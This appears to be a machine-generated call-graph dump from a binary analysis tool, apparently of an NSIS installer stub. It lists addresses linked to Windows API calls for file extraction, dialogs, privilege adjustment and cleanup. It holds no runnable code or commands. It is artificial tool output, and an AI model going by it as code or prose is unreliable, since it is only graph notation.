40265d 4176->4177 4178 406c5f 4184 406ae3 4178->4184 4179 40744e 4180 406b64 GlobalFree 4181 406b6d GlobalAlloc 4180->4181 4181->4179 4181->4184 4182 406be4 GlobalAlloc 4182->4179 4182->4184 4183 406bdb GlobalFree 4183->4182 4184->4179 4184->4180 4184->4181 4184->4182 4184->4183 4185 402663 4186 402692 4185->4186 4187 402677 4185->4187 4189 4026c2 4186->4189 4190 402697 4186->4190 4188 402da9 21 API calls 4187->4188 4199 40267e 4188->4199 4192 402dcb 21 API calls 4189->4192 4191 402dcb 21 API calls 4190->4191 4193 40269e 4191->4193 4194 4026c9 lstrlenW 4192->4194 4202 406563 WideCharToMultiByte 4193->4202 4194->4199 4196 4026b2 lstrlenA 4196->4199 4197 4026f6 4198 40270c 4197->4198 4200 4060e3 WriteFile 4197->4200 4199->4197 4199->4198 4203 406112 SetFilePointer 4199->4203 4200->4198 4202->4196 4204 40612e 4203->4204 4205 406146 4203->4205 4206 4060b4 ReadFile 4204->4206 4205->4197 4207 40613a 4206->4207 4207->4205 4208 406177 SetFilePointer 4207->4208 4209 40614f SetFilePointer 4207->4209 4208->4205 4209->4208 4210 40615a 4209->4210 4211 4060e3 WriteFile 4210->4211 4211->4205 3592 4015e6 3593 402dcb 21 API calls 3592->3593 3594 4015ed 3593->3594 3612 405ebb CharNextW CharNextW 3594->3612 3596 401656 3598 401688 3596->3598 3599 40165b 3596->3599 3597 405e3d CharNextW 3605 4015f6 3597->3605 3602 401423 28 API calls 3598->3602 3618 401423 3599->3618 3609 401680 3602->3609 3605->3596 3605->3597 3608 40163c GetFileAttributesW 3605->3608 3610 40161f 3605->3610 3622 405b0c 3605->3622 3628 405aef CreateDirectoryW 3605->3628 3607 40166f SetCurrentDirectoryW 3607->3609 3608->3605 3610->3605 3625 405a95 CreateDirectoryW 3610->3625 3613 405ed8 3612->3613 3615 405eea 3612->3615 3614 405ee5 CharNextW 3613->3614 3613->3615 3617 405f0e 3614->3617 3616 405e3d CharNextW 3615->3616 3615->3617 3616->3615 3617->3605 3619 4055c6 28 API calls 3618->3619 3620 401431 3619->3620 3621 406541 lstrcpynW 3620->3621 3621->3607 3623 406935 5 API calls 3622->3623 3624 405b13 3623->3624 3624->3605 3626 405ae1 3625->3626 3627 405ae5 GetLastError 3625->3627 3626->3610 3627->3626 3629 405b03 GetLastError 3628->3629 3630 405aff 3628->3630 3629->3630 3630->3605 4218 401c68 4219 402da9 21 API calls 4218->4219 4220 401c6f 4219->4220 4221 402da9 21 API calls 4220->4221 4222 401c7c 4221->4222 4223 401c91 4222->4223 4224 402dcb 21 API calls 4222->4224 4225 401ca1 4223->4225 4226 402dcb 21 API calls 4223->4226 4224->4223 4227 401cf8 4225->4227 4228 401cac 4225->4228 4226->4225 4229 402dcb 21 API calls 4227->4229 4230 402da9 21 API calls 4228->4230 4232 401cfd 4229->4232 4231 401cb1 4230->4231 4233 402da9 21 API calls 4231->4233 4234 402dcb 21 API calls 4232->4234 4235 401cbd 4233->4235 4236 401d06 FindWindowExW 4234->4236 4237 401ce8 SendMessageW 4235->4237 4238 401cca SendMessageTimeoutW 4235->4238 4239 401d28 4236->4239 4237->4239 4238->4239 4247 4028e9 4248 4028ef 4247->4248 4249 4028f7 FindClose 4248->4249 4250 402c4f 4248->4250 4249->4250 4251 40496a 4252 4049a0 4251->4252 4253 40497a 4251->4253 4254 404527 8 API calls 4252->4254 4255 4044c0 22 API calls 4253->4255 4257 4049ac 4254->4257 4256 404987 SetDlgItemTextW 4255->4256 4256->4252 4258 4016f1 4259 402dcb 21 API calls 4258->4259 4260 4016f7 GetFullPathNameW 4259->4260 4261 401711 4260->4261 4267 401733 4260->4267 4264 40689e 2 API calls 4261->4264 4261->4267 4262 401748 GetShortPathNameW 4263 402c4f 4262->4263 4265 401723 4264->4265 4265->4267 4268 406541 lstrcpynW 4265->4268 4267->4262 4267->4263 4268->4267 4269 401e73 GetDC 4270 402da9 21 API calls 4269->4270 4271 401e85 GetDeviceCaps MulDiv ReleaseDC 4270->4271 4272 402da9 21 API calls 4271->4272 4273 401eb6 4272->4273 4274 40657e 21 API calls 4273->4274 4275 401ef3 CreateFontIndirectW 4274->4275 4276 40265d 4275->4276 4277 402975 4278 402dcb 21 API calls 4277->4278 4279 402981 4278->4279 4280 402997 4279->4280 4281 402dcb 21 API calls 4279->4281 4282 40600c 2 API calls 4280->4282 4281->4280 4283 40299d 4282->4283 4305 406031 GetFileAttributesW CreateFileW 4283->4305 4285 4029aa 4286 402a60 4285->4286 4287 4029c5 GlobalAlloc 4285->4287 4288 402a48 4285->4288 4289 402a67 DeleteFileW 4286->4289 4290 402a7a 4286->4290 4287->4288 4291 4029de 4287->4291 4292 4032d9 39 API calls 4288->4292 4289->4290 4306 4034d4 SetFilePointer 4291->4306 4294 402a55 CloseHandle 4292->4294 4294->4286 4295 4029e4 4296 4034be ReadFile 4295->4296 4297 4029ed GlobalAlloc 4296->4297 4298 402a31 4297->4298 4299 4029fd 4297->4299 4301 4060e3 WriteFile 4298->4301 4300 4032d9 39 API calls 4299->4300 4304 402a0a 4300->4304 4302 402a3d GlobalFree 4301->4302 4302->4288 4303 402a28 GlobalFree 4303->4298 4304->4303 4305->4285 4306->4295 4307 4014f5 SetForegroundWindow 4308 402c4f 4307->4308 4309 4045f6 lstrcpynW lstrlenW 4310 40197b 4311 402dcb 21 API calls 4310->4311 4312 401982 lstrlenW 4311->4312 4313 40265d 4312->4313 4314 4020fd 4315 4021c1 4314->4315 4316 40210f 4314->4316 4319 401423 28 API calls 4315->4319 4317 402dcb 21 API calls 4316->4317 4318 402116 4317->4318 4320 402dcb 21 API calls 4318->4320 4324 40231b 4319->4324 4321 40211f 4320->4321 4322 402135 LoadLibraryExW 4321->4322 4323 402127 GetModuleHandleW 4321->4323 4322->4315 4325 402146 4322->4325 4323->4322 4323->4325 4334 4069a4 4325->4334 4328 402190 4331 4055c6 28 API calls 4328->4331 4329 402157 4330 402167 4329->4330 4332 401423 28 API calls 4329->4332 4330->4324 4333 4021b3 FreeLibrary 4330->4333 4331->4330 4332->4330 4333->4324 4339 406563 WideCharToMultiByte 4334->4339 4336 4069c1 4337 4069c8 GetProcAddress 4336->4337 4338 402151 4336->4338 4337->4338 4338->4328 4338->4329 4339->4336 4340 402b7e 4341 402bd0 4340->4341 4342 402b85 4340->4342 4343 406935 5 API calls 4341->4343 4345 402da9 21 API calls 4342->4345 4348 402bce 4342->4348 4344 402bd7 4343->4344 4346 402dcb 21 API calls 4344->4346 4347 402b93 4345->4347 4349 402be0 4346->4349 4350 402da9 21 API calls 4347->4350 4349->4348 4351 402be4 IIDFromString 4349->4351 4352 402b9f 4350->4352 4351->4348 4353 402bf3 4351->4353 4357 406488 wsprintfW 4352->4357 4353->4348 4358 406541 lstrcpynW 4353->4358 4355 402c10 CoTaskMemFree 4355->4348 4357->4348 4358->4355 4366 40467f 4367 404697 4366->4367 4373 4047b1 4366->4373 4371 4044c0 22 API calls 4367->4371 4368 40481b 4369 4048e5 4368->4369 4370 404825 GetDlgItem 4368->4370 4376 404527 8 API calls 4369->4376 4372 40483f 4370->4372 4377 4048a6 4370->4377 4375 4046fe 4371->4375 4372->4377 4381 404865 SendMessageW LoadCursorW SetCursor 4372->4381 4373->4368 4373->4369 4374 4047ec GetDlgItem SendMessageW 4373->4374 4399 4044e2 KiUserCallbackDispatcher 4374->4399 4379 4044c0 22 API calls 4375->4379 4380 4048e0 4376->4380 4377->4369 4382 4048b8 4377->4382 4384 40470b CheckDlgButton 4379->4384 4403 40492e 4381->4403 4386 4048ce 4382->4386 4387 4048be SendMessageW 4382->4387 4383 404816 4400 40490a 4383->4400 4397 4044e2 KiUserCallbackDispatcher 4384->4397 4386->4380 4388 4048d4 SendMessageW 4386->4388 4387->4386 4388->4380 4392 404729 GetDlgItem 4398 4044f5 SendMessageW 4392->4398 4394 40473f SendMessageW 4395 404765 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4394->4395 4396 40475c GetSysColor 4394->4396 4395->4380 4396->4395 4397->4392 4398->4394 4399->4383 4401 404918 4400->4401 4402 40491d SendMessageW 4400->4402 4401->4402 4402->4368 4406 405b67 ShellExecuteExW 4403->4406 4405 404894 LoadCursorW SetCursor 4405->4377 4406->4405 4407 401000 4408 401037 BeginPaint GetClientRect 4407->4408 4409 40100c DefWindowProcW 4407->4409 4411 4010f3 4408->4411 4412 401179 4409->4412 4413 401073 CreateBrushIndirect FillRect DeleteObject 4411->4413 4414 4010fc 4411->4414 4413->4411 4415 401102 CreateFontIndirectW 4414->4415 4416 401167 EndPaint 4414->4416 4415->4416 4417 401112 6 API calls 4415->4417 4416->4412 4417->4416 4418 402a80 4419 402da9 21 API calls 4418->4419 4420 402a86 4419->4420 4421 402ac9 4420->4421 4422 402aad 4420->4422 4427 402953 4420->4427 4424 402ae3 4421->4424 4425 402ad3 4421->4425 4423 402ab2 4422->4423 4431 402ac3 4422->4431 4432 406541 lstrcpynW 4423->4432 4426 40657e 21 API calls 4424->4426 4428 402da9 21 API calls 4425->4428 4426->4431 4428->4431 4431->4427 4433 406488 wsprintfW 4431->4433 4432->4427 4433->4427 4434 401781 4435 402dcb 21 API calls 4434->4435 4436 401788 4435->4436 4437 406060 2 API calls 4436->4437 4438 40178f 4437->4438 4438->4438 4439 401d82 4440 402da9 21 API calls 4439->4440 4441 401d93 SetWindowLongW 4440->4441 4442 402c4f 4441->4442 3423 401f03 3431 402da9 3423->3431 3425 401f09 3426 402da9 21 API calls 3425->3426 3427 401f15 3426->3427 3428 401f21 ShowWindow 3427->3428 3429 401f2c EnableWindow 3427->3429 3430 402c4f 3428->3430 3429->3430 3432 40657e 21 API calls 3431->3432 3433 402dbe 3432->3433 3433->3425 4443 401503 4444 401508 4443->4444 4446 40152e 4443->4446 4445 402da9 21 API calls 4444->4445 4445->4446 4447 402903 4448 40290b 4447->4448 4449 40290f FindNextFileW 4448->4449 4450 402921 4448->4450 4449->4450 4451 402968 4449->4451 4453 406541 lstrcpynW 4451->4453 4453->4450 3537 405705 3538 405726 GetDlgItem GetDlgItem GetDlgItem 3537->3538 3539 4058af 3537->3539 3582 4044f5 SendMessageW 3538->3582 3541 4058e0 3539->3541 3542 4058b8 GetDlgItem CreateThread CloseHandle 3539->3542 3544 40590b 3541->3544 3545 405930 3541->3545 3546 4058f7 ShowWindow ShowWindow 3541->3546 3542->3541 3585 405699 OleInitialize 3542->3585 3543 405796 3549 40579d GetClientRect GetSystemMetrics SendMessageW SendMessageW 3543->3549 3547 40596b 3544->3547 3551 405945 ShowWindow 3544->3551 3552 40591f 3544->3552 3548 404527 8 API calls 3545->3548 3584 4044f5 SendMessageW 3546->3584 3547->3545 3557 405979 SendMessageW 3547->3557 3564 40593e 3548->3564 3555 40580b 3549->3555 3556 4057ef SendMessageW SendMessageW 3549->3556 3553 405965 3551->3553 3554 405957 3551->3554 3558 404499 SendMessageW 3552->3558 3560 404499 SendMessageW 3553->3560 3559 4055c6 28 API calls 3554->3559 3561 405810 SendMessageW 3555->3561 3562 40581e 3555->3562 3556->3555 3563 405992 CreatePopupMenu 3557->3563 3557->3564 3558->3545 3559->3553 3560->3547 3561->3562 3566 4044c0 22 API calls 3562->3566 3565 40657e 21 API calls 3563->3565 3567 4059a2 AppendMenuW 3565->3567 3568 40582e 3566->3568 3569 4059d2 TrackPopupMenu 3567->3569 3570 4059bf GetWindowRect 3567->3570 3571 405837 ShowWindow 3568->3571 3572 40586b GetDlgItem SendMessageW 3568->3572 3569->3564 3574 4059ed 3569->3574 3570->3569 3575 40585a 3571->3575 3576 40584d ShowWindow 3571->3576 3572->3564 3573 405892 SendMessageW SendMessageW 3572->3573 3573->3564 3577 405a09 SendMessageW 3574->3577 3583 4044f5 SendMessageW 3575->3583 3576->3575 3577->3577 3578 405a26 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3577->3578 3580 405a4b SendMessageW 3578->3580 3580->3580 3581 405a74 GlobalUnlock SetClipboardData CloseClipboard 3580->3581 3581->3564 3582->3543 3583->3572 3584->3544 3586 40450c SendMessageW 3585->3586 3590 4056bc 3586->3590 3587 4056e3 3588 40450c SendMessageW 3587->3588 3589 4056f5 CoUninitialize 3588->3589 3590->3587 3591 401389 2 API calls 3590->3591 3591->3590 4454 404d07 4455 404d33 4454->4455 4456 404d17 4454->4456 4458 404d66 4455->4458 4459 404d39 SHGetPathFromIDListW 4455->4459 4465 405b85 GetDlgItemTextW 4456->4465 4461 404d49 4459->4461 4464 404d50 SendMessageW 4459->4464 4460 404d24 SendMessageW 4460->4455 4462 40140b 2 API calls 4461->4462 4462->4464 4464->4458 4465->4460 4466 401588 4467 402bc9 4466->4467 4470 406488 wsprintfW 4467->4470 4469 402bce 4470->4469 4471 40198d 4472 402da9 21 API calls 4471->4472 4473 401994 4472->4473 4474 402da9 21 API calls 4473->4474 4475 4019a1 4474->4475 4476 402dcb 21 API calls 4475->4476 4477 4019b8 lstrlenW 4476->4477 4479 4019c9 4477->4479 4478 401a0a 4479->4478 4483 406541 lstrcpynW 4479->4483 4481 4019fa 4481->4478 4482 4019ff lstrlenW 4481->4482 4482->4478 4483->4481 4484 40168f 4485 402dcb 21 API calls 4484->4485 4486 401695 4485->4486 4487 40689e 2 API calls 4486->4487 4488 40169b 4487->4488 4489 402b10 4490 402da9 21 API calls 4489->4490 4491 402b16 4490->4491 4492 402953 4491->4492 4493 40657e 21 API calls 4491->4493 4493->4492 4494 402711 4495 402da9 21 API calls 4494->4495 4502 402720 4495->4502 4496 40276a ReadFile 4496->4502 4506 40285d 4496->4506 4497 4060b4 ReadFile 4497->4502 4498 4027aa MultiByteToWideChar 4498->4502 4499 40285f 4507 406488 wsprintfW 4499->4507 4500 406112 5 API calls 4500->4502 4502->4496 4502->4497 4502->4498 4502->4499 4502->4500 4503 4027d0 SetFilePointer MultiByteToWideChar 4502->4503 4504 402870 4502->4504 4502->4506 4503->4502 4505 402891 SetFilePointer 4504->4505 4504->4506 4505->4506 4507->4506 4508 401491 4509 4055c6 28 API calls 4508->4509 4510 401498 4509->4510 3434 401794 3472 402dcb 3434->3472 3436 40179b 3437 4017c3 3436->3437 3438 4017bb 3436->3438 3515 406541 lstrcpynW 3437->3515 3514 406541 lstrcpynW 3438->3514 3441 4017c1 3445 4067ef 5 API calls 3441->3445 3442 4017ce 3516 405e10 lstrlenW CharPrevW 3442->3516 3461 4017e0 3445->3461 3449 4017f2 CompareFileTime 3449->3461 3450 4018b2 3482 4055c6 3450->3482 3451 401889 3454 4055c6 28 API calls 3451->3454 3463 40189e 3451->3463 3454->3463 3455 406541 lstrcpynW 3455->3461 3458 4018e3 SetFileTime 3460 4018f5 CloseHandle 3458->3460 3459 40657e 21 API calls 3459->3461 3462 401906 3460->3462 3460->3463 3461->3449 3461->3450 3461->3451 3461->3455 3461->3459 3468 405ba1 MessageBoxIndirectW 3461->3468 3478 40600c GetFileAttributesW 3461->3478 3481 406031 GetFileAttributesW CreateFileW 3461->3481 3519 40689e FindFirstFileW 3461->3519 3464 40190b 3462->3464 3465 40191e 3462->3465 3466 40657e 21 API calls 3464->3466 3467 40657e 21 API calls 3465->3467 3469 401913 lstrcatW 3466->3469 3470 401926 3467->3470 3468->3461 3469->3470 3471 405ba1 MessageBoxIndirectW 3470->3471 3471->3463 3473 402dd7 3472->3473 3474 40657e 21 API calls 3473->3474 3475 402df8 3474->3475 3476 402e04 3475->3476 3477 4067ef 5 API calls 3475->3477 3476->3436 3477->3476 3479 40602b 3478->3479 3480 40601e SetFileAttributesW 3478->3480 3479->3461 3480->3479 3481->3461 3483 4055e1 3482->3483 3492 4018bc 3482->3492 3484 4055fd lstrlenW 3483->3484 3485 40657e 21 API calls 3483->3485 3486 405626 3484->3486 3487 40560b lstrlenW 3484->3487 3485->3484 3489 405639 3486->3489 3490 40562c SetWindowTextW 3486->3490 3488 40561d lstrcatW 3487->3488 3487->3492 3488->3486 3491 40563f SendMessageW SendMessageW SendMessageW 3489->3491 3489->3492 3490->3489 3491->3492 3493 4032d9 3492->3493 3494 4032f2 3493->3494 3495 40331d 3494->3495 3534 4034d4 SetFilePointer 3494->3534 3522 4034be 3495->3522 3499 40333a GetTickCount 3510 40334d 3499->3510 3500 40345e 3501 403462 3500->3501 3506 40347a 3500->3506 3503 4034be ReadFile 3501->3503 3502 4018cf 3502->3458 3502->3460 3503->3502 3504 4034be ReadFile 3504->3506 3505 4034be ReadFile 3505->3510 3506->3502 3506->3504 3507 4060e3 WriteFile 3506->3507 3507->3506 3509 4033b3 GetTickCount 3509->3510 3510->3502 3510->3505 3510->3509 3511 4033dc MulDiv wsprintfW 3510->3511 3525 406ab0 3510->3525 3532 4060e3 WriteFile 3510->3532 3512 4055c6 28 API calls 3511->3512 3512->3510 3514->3441 3515->3442 3517 4017d4 lstrcatW 3516->3517 3518 405e2c lstrcatW 3516->3518 3517->3441 3518->3517 3520 4068b4 FindClose 3519->3520 3521 4068bf 3519->3521 3520->3521 3521->3461 3535 4060b4 ReadFile 3522->3535 3526 406ad5 3525->3526 3527 406add 3525->3527 3526->3510 3527->3526 3528 406b64 GlobalFree 3527->3528 3529 406b6d GlobalAlloc 3527->3529 3530 406be4 GlobalAlloc 3527->3530 3531 406bdb GlobalFree 3527->3531 3528->3529 3529->3526 3529->3527 3530->3526 3530->3527 3531->3530 3533 406101 3532->3533 3533->3510 3534->3495 3536 403328 3535->3536 3536->3499 3536->3500 3536->3502 4525 401a97 4526 402da9 21 API calls 4525->4526 4527 401aa0 4526->4527 4528 402da9 21 API calls 4527->4528 4529 401a45 4528->4529 3635 401598 3636 4015b1 3635->3636 3637 4015a8 ShowWindow 3635->3637 3638 402c4f 3636->3638 3639 4015bf ShowWindow 3636->3639 3637->3636 3639->3638 4530 402419 4531 402dcb 21 API calls 4530->4531 4532 402428 4531->4532 4533 402dcb 21 API calls 4532->4533 4534 402431 4533->4534 4535 402dcb 21 API calls 4534->4535 4536 40243b GetPrivateProfileStringW 4535->4536 4537 40201b 4538 402dcb 21 API calls 4537->4538 4539 402022 4538->4539 4540 40689e 2 API calls 4539->4540 4541 402028 4540->4541 4543 402039 4541->4543 4544 406488 wsprintfW 4541->4544 4544->4543 3668 40351c SetErrorMode GetVersionExW 3669 403570 GetVersionExW 3668->3669 3670 4035a8 3668->3670 3669->3670 3671 4035ff 3670->3671 3672 406935 5 API calls 3670->3672 3673 4068c5 3 API calls 3671->3673 3672->3671 3674 403615 lstrlenA 3673->3674 3674->3671 3675 403625 3674->3675 3676 406935 5 API calls 3675->3676 3677 40362c 3676->3677 3678 406935 5 API calls 3677->3678 3679 403633 3678->3679 3680 406935 5 API calls 3679->3680 3681 40363f #17 OleInitialize SHGetFileInfoW 3680->3681 3756 406541 lstrcpynW 3681->3756 3684 40368e GetCommandLineW 3757 406541 lstrcpynW 3684->3757 3686 4036a0 3687 405e3d CharNextW 3686->3687 3688 4036c6 CharNextW 3687->3688 3696 4036d8 3688->3696 3689 4037da 3690 4037ee GetTempPathW 3689->3690 3758 4034eb 3690->3758 3692 403806 3693 403860 DeleteFileW 3692->3693 3694 40380a GetWindowsDirectoryW lstrcatW 3692->3694 3768 4030a2 GetTickCount GetModuleFileNameW 3693->3768 3697 4034eb 12 API calls 3694->3697 3695 405e3d CharNextW 3695->3696 3696->3689 3696->3695 3702 4037dc 3696->3702 3699 403826 3697->3699 3699->3693 3701 40382a GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3699->3701 3700 403874 3703 40392b 3700->3703 3706 40391b 3700->3706 3710 405e3d CharNextW 3700->3710 3704 4034eb 12 API calls 3701->3704 3852 406541 lstrcpynW 3702->3852 3911 403b39 3703->3911 3708 403858 3704->3708 3796 403c13 3706->3796 3708->3693 3708->3703 3723 403893 3710->3723 3712 403a79 3716 405ba1 MessageBoxIndirectW 3712->3716 3713 403a9d 3714 403b21 ExitProcess 3713->3714 3715 403aa5 GetCurrentProcess OpenProcessToken 3713->3715 3717 403af1 3715->3717 3718 403abd LookupPrivilegeValueW AdjustTokenPrivileges 3715->3718 3722 403a87 ExitProcess 3716->3722 3725 406935 5 API calls 3717->3725 3718->3717 3719 4038f1 3853 405f18 3719->3853 3720 403934 3724 405b0c 5 API calls 3720->3724 3723->3719 3723->3720 3727 403939 lstrlenW 3724->3727 3728 403af8 3725->3728 3869 406541 lstrcpynW 3727->3869 3731 403b0d ExitWindowsEx 3728->3731 3733 403b1a 3728->3733 3731->3714 3731->3733 3732 403953 3735 40395c 3732->3735 3753 40396b 3732->3753 3736 40140b 2 API calls 3733->3736 3870 406541 lstrcpynW 3735->3870 3736->3714 3737 403910 3868 406541 lstrcpynW 3737->3868 3740 403991 wsprintfW 3741 40657e 21 API calls 3740->3741 3741->3753 3742 405aef 2 API calls 3742->3753 3743 405a95 2 API calls 3743->3753 3744 403a07 SetCurrentDirectoryW 3907 406301 MoveFileExW 3744->3907 3745 4039cd GetFileAttributesW 3746 4039d9 DeleteFileW 3745->3746 3745->3753 3746->3753 3750 406301 40 API calls 3750->3753 3751 40657e 21 API calls 3751->3753 3752 405b24 2 API calls 3752->3753 3753->3703 3753->3740 3753->3742 3753->3743 3753->3744 3753->3745 3753->3750 3753->3751 3753->3752 3754 403a8f CloseHandle 3753->3754 3755 40689e 2 API calls 3753->3755 3871 405c4d 3753->3871 3754->3703 3755->3753 3756->3684 3757->3686 3759 4067ef 5 API calls 3758->3759 3760 4034f7 3759->3760 3761 403501 3760->3761 3762 405e10 3 API calls 3760->3762 3761->3692 3763 403509 3762->3763 3764 405aef 2 API calls 3763->3764 3765 40350f 3764->3765 3918 406060 3765->3918 3922 406031 GetFileAttributesW CreateFileW 3768->3922 3770 4030e2 3791 4030f2 3770->3791 3923 406541 lstrcpynW 3770->3923 3772 403108 3924 405e5c lstrlenW 3772->3924 3776 403119 GetFileSize 3777 403213 3776->3777 3789 403130 3776->3789 3929 40303e 3777->3929 3779 40321c 3781 40324c GlobalAlloc 3779->3781 3779->3791 3941 4034d4 SetFilePointer 3779->3941 3780 4034be ReadFile 3780->3789 3940 4034d4 SetFilePointer 3781->3940 3783 40327f 3787 40303e 6 API calls 3783->3787 3785 403235 3788 4034be ReadFile 3785->3788 3786 403267 3790 4032d9 39 API calls 3786->3790 3787->3791 3792 403240 3788->3792 3789->3777 3789->3780 3789->3783 3789->3791 3793 40303e 6 API calls 3789->3793 3794 403273 3790->3794 3791->3700 3792->3781 3792->3791 3793->3789 3794->3791 3794->3794 3795 4032b0 SetFilePointer 3794->3795 3795->3791 3797 406935 5 API calls 3796->3797 3798 403c27 3797->3798 3799 403c2d 3798->3799 3800 403c3f 3798->3800 3950 406488 wsprintfW 3799->3950 3801 40640f 3 API calls 3800->3801 3802 403c6f 3801->3802 3804 403c8e lstrcatW 3802->3804 3806 40640f 3 API calls 3802->3806 3805 403c3d 3804->3805 3942 403ee9 3805->3942 3806->3804 3809 405f18 18 API calls 3810 403cc0 3809->3810 3811 403d54 3810->3811 3813 40640f 3 API calls 3810->3813 3812 405f18 18 API calls 3811->3812 3814 403d5a 3812->3814 3815 403cf2 3813->3815 3816 403d6a LoadImageW 3814->3816 3817 40657e 21 API calls 3814->3817 3815->3811 3820 403d13 lstrlenW 3815->3820 3824 405e3d CharNextW 3815->3824 3818 403e10 3816->3818 3819 403d91 RegisterClassW 3816->3819 3817->3816 3822 40140b 2 API calls 3818->3822 3821 403dc7 SystemParametersInfoW CreateWindowExW 3819->3821 3851 403e1a 3819->3851 3825 403d21 lstrcmpiW 3820->3825 3826 403d47 3820->3826 3821->3818 3823 403e16 3822->3823 3830 403ee9 22 API calls 3823->3830 3823->3851 3828 403d10 3824->3828 3825->3826 3829 403d31 GetFileAttributesW 3825->3829 3827 405e10 3 API calls 3826->3827 3831 403d4d 3827->3831 3828->3820 3832 403d3d 3829->3832 3834 403e27 3830->3834 3951 406541 lstrcpynW 3831->3951 3832->3826 3833 405e5c 2 API calls 3832->3833 3833->3826 3836 403e33 ShowWindow 3834->3836 3837 403eb6 3834->3837 3839 4068c5 3 API calls 3836->3839 3838 405699 5 API calls 3837->3838 3840 403ebc 3838->3840 3841 403e4b 3839->3841 3842 403ec0 3840->3842 3843 403ed8 3840->3843 3844 403e59 GetClassInfoW 3841->3844 3846 4068c5 3 API calls 3841->3846 3849 40140b 2 API calls 3842->3849 3842->3851 3845 40140b 2 API calls 3843->3845 3847 403e83 DialogBoxParamW 3844->3847 3848 403e6d GetClassInfoW RegisterClassW 3844->3848 3845->3851 3846->3844 3850 40140b 2 API calls 3847->3850 3848->3847 3849->3851 3850->3851 3851->3703 3852->3690 3953 406541 lstrcpynW 3853->3953 3855 405f29 3856 405ebb 4 API calls 3855->3856 3857 405f2f 3856->3857 3858 4038fd 3857->3858 3859 4067ef 5 API calls 3857->3859 3858->3703 3867 406541 lstrcpynW 3858->3867 3865 405f3f 3859->3865 3860 405f70 lstrlenW 3861 405f7b 3860->3861 3860->3865 3862 405e10 3 API calls 3861->3862 3864 405f80 GetFileAttributesW 3862->3864 3863 40689e 2 API calls 3863->3865 3864->3858 3865->3858 3865->3860 3865->3863 3866 405e5c 2 API calls 3865->3866 3866->3860 3867->3737 3868->3706 3869->3732 3870->3753 3872 405f18 18 API calls 3871->3872 3873 405c6d 3872->3873 3874 405c75 DeleteFileW 3873->3874 3875 405c8c 3873->3875 3876 405dc3 3874->3876 3878 405dac 3875->3878 3954 406541 lstrcpynW 3875->3954 3876->3753 3878->3876 3884 40689e 2 API calls 3878->3884 3879 405cb2 3880 405cc5 3879->3880 3881 405cb8 lstrcatW 3879->3881 3883 405e5c 2 API calls 3880->3883 3882 405ccb 3881->3882 3885 405cdb lstrcatW 3882->3885 3887 405ce6 lstrlenW FindFirstFileW 3882->3887 3883->3882 3886 405dd1 3884->3886 3885->3887 3886->3876 3888 405e10 3 API calls 3886->3888 3887->3878 3905 405d08 3887->3905 3889 405ddb 3888->3889 3891 405c05 5 API calls 3889->3891 3890 405d8f FindNextFileW 3893 405da5 FindClose 3890->3893 3890->3905 3894 405de7 3891->3894 3893->3878 3895 405e01 3894->3895 3896 405deb 3894->3896 3898 4055c6 28 API calls 3895->3898 3896->3876 3899 4055c6 28 API calls 3896->3899 3898->3876 3901 405df8 3899->3901 3900 405c4d 64 API calls 3900->3905 3902 406301 40 API calls 3901->3902 3902->3876 3903 4055c6 28 API calls 3903->3890 3904 4055c6 28 API calls 3904->3905 3905->3890 3905->3900 3905->3903 3905->3904 3906 406301 40 API calls 3905->3906 3955 406541 lstrcpynW 3905->3955 3956 405c05 3905->3956 3906->3905 3908 403a16 CopyFileW 3907->3908 3909 406315 3907->3909 3908->3703 3908->3753 3964 406187 3909->3964 3912 403b51 3911->3912 3913 403b43 CloseHandle 3911->3913 3998 403b7e 3912->3998 3913->3912 3916 405c4d 71 API calls 3917 403a6c OleUninitialize 3916->3917 3917->3712 3917->3713 3919 40606d GetTickCount GetTempFileNameW 3918->3919 3920 40351a 3919->3920 3921 4060a3 3919->3921 3920->3692 3921->3919 3921->3920 3922->3770 3923->3772 3925 405e6a 3924->3925 3926 405e70 CharPrevW 3925->3926 3927 40310e 3925->3927 3926->3925 3926->3927 3928 406541 lstrcpynW 3927->3928 3928->3776 3930 403047 3929->3930 3931 40305f 3929->3931 3932 403050 DestroyWindow 3930->3932 3933 403057 3930->3933 3934 403067 3931->3934 3935 40306f GetTickCount 3931->3935 3932->3933 3933->3779 3936 406971 2 API calls 3934->3936 3937 4030a0 3935->3937 3938 40307d CreateDialogParamW ShowWindow 3935->3938 3939 40306d 3936->3939 3937->3779 3938->3937 3939->3779 3940->3786 3941->3785 3943 403efd 3942->3943 3952 406488 wsprintfW 3943->3952 3945 403f6e 3946 403fa2 22 API calls 3945->3946 3948 403f73 3946->3948 3947 403c9e 3947->3809 3948->3947 3949 40657e 21 API calls 3948->3949 3949->3948 3950->3805 3951->3811 3952->3945 3953->3855 3954->3879 3955->3905 3957 40600c 2 API calls 3956->3957 3958 405c11 3957->3958 3959 405c32 3958->3959 3960 405c20 RemoveDirectoryW 3958->3960 3961 405c28 DeleteFileW 3958->3961 3959->3905 3962 405c2e 3960->3962 3961->3962 3962->3959 3963 405c3e SetFileAttributesW 3962->3963 3963->3959 3965 4061b7 3964->3965 3966 4061dd GetShortPathNameW 3964->3966 3991 406031 GetFileAttributesW CreateFileW 3965->3991 3968 4061f2 3966->3968 3969 4062fc 3966->3969 3968->3969 3971 4061fa wsprintfA 3968->3971 3969->3908 3970 4061c1 CloseHandle GetShortPathNameW 3970->3969 3972 4061d5 3970->3972 3973 40657e 21 API calls 3971->3973 3972->3966 3972->3969 3974 406222 3973->3974 3992 406031 GetFileAttributesW CreateFileW 3974->3992 3976 40622f 3976->3969 3977 40623e GetFileSize GlobalAlloc 3976->3977 3978 406260 3977->3978 3979 4062f5 CloseHandle 3977->3979 3980 4060b4 ReadFile 3978->3980 3979->3969 3981 406268 3980->3981 3981->3979 3993 405f96 lstrlenA 3981->3993 3984 406293 3986 405f96 4 API calls 3984->3986 3985 40627f lstrcpyA 3987 4062a1 3985->3987 3986->3987 3988 4062d8 SetFilePointer 3987->3988 3989 4060e3 WriteFile 3988->3989 3990 4062ee GlobalFree 3989->3990 3990->3979 3991->3970 3992->3976 3994 405fd7 lstrlenA 3993->3994 3995 405fb0 lstrcmpiA 3994->3995 3996 405fdf 3994->3996 3995->3996 3997 405fce CharNextA 3995->3997 3996->3984 3996->3985 3997->3994 3999 403b8c 3998->3999 4000 403b56 3999->4000 4001 403b91 FreeLibrary GlobalFree 3999->4001 4000->3916 4001->4000 4001->4001 4552 401b9c 4553 402dcb 21 API calls 4552->4553 4554 401ba3 4553->4554 4555 402da9 21 API calls 4554->4555 